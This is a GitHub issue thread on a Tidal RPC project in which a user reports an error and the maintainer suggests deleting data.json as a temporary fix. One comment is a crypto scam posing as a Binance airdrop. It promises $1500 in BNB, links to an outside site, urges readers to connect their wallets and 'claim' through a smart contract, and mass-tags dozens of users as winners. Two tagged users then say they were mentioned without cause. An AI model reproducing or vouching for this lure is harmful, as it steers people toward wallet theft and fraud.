### ISSUE TITLE
Error Spasm Attack

### ISSUE THREAD

**Issue by Abadima** [NotII/Tidal-RPC#20]
![image](https://user-images.githubusercontent.com/39747270/131231230-910c9cb1-6a41-450d-8bf3-5c9cfdb7b059.png)

what in the world

**Comment by NotII** [comment]
Delete the data.json file, should fix it.

**Comment by NotII** [comment]
Temporary fix for now ^ I'm going to improve the code when I'm not busy.

**Comment by sandeep661** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @wasimbeniwale, @rover-debug, @alexander-lamdan, @DavidRedstone, @egantz, @schalkburger, @AlexTan331, @xkcm, @anasaboayham, @aenvgiell, @eduardostuart, @Maverik010, @nightcrawler-, @vancaem, @4thNeko, @CauaneAndrade, @Dobby233Liu, @saurabhdaware, @sffetlio, @hojat72elect, @fvarghese99, @emanuelschmitt, @coronin, @crrystalz, @Sviut, @workluckti, @movila, @vitorarantes, @peterlikesnoodles, @loureirorg, @mvpbang, @miloslavnosek, @fvknl, @code2man, @Domlaa, @TheOguzhan, @mkoo21, @Baonguyen045, @siberiawolf, @glitch, @RoozerXC, @amel, @xtools-at, @gamecraftCZ, @koubele, @airtoxin, @kjlo, @d4ydr34mzzz, @1raa, @eaxeax

**Comment by RoozerXC** [comment]
Hey, sorry for being off topic but I was mentioned on this issue somehow. I don't remember following or subscribing to this repository for any updates and notifications, and I can't seem to find any mentioning of me in these posts.

![image](https://github.com/NotII/Tidal-RPC/assets/45127566/3c2055e7-5fc3-4c68-b88d-1cbfa3a98875)

**Comment by miloslavnosek** [comment]
> Hey, sorry for being off topic but I was mentioned on this issue somehow. I don't remember following or subscribing to this repository for any updates and notifications, and I can't seem to find any mentioning of me in these posts.
> 
> ![image](https://private-user-images.githubusercontent.com/45127566/295964637-3c2055e7-5fc3-4c68-b88d-1cbfa3a98875.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MDQ5ODc3NzYsIm5iZiI6MTcwNDk4NzQ3NiwicGF0aCI6Ii80NTEyNzU2Ni8yOTU5NjQ2MzctM2MyMDU1ZTctNWZjMy00YzY4LWI4OGQtMWNiZmEzYTk4ODc1LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDAxMTElMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwMTExVDE1Mzc1NlomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWQ2MWIyZjhiMTBlODRkNTA0ZDI0YjliODMyMzMzMTBhZThkYTFkNTQyMzM2MDFmOTEzMTgxYjE5OGE0YzQ5NzAmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.S8o5r5anhQK7Aud2W2Y13FszyxNNm7cUaj3aQzbYUHY)

Yeah, that makes two of us. I don't even use Tidal.
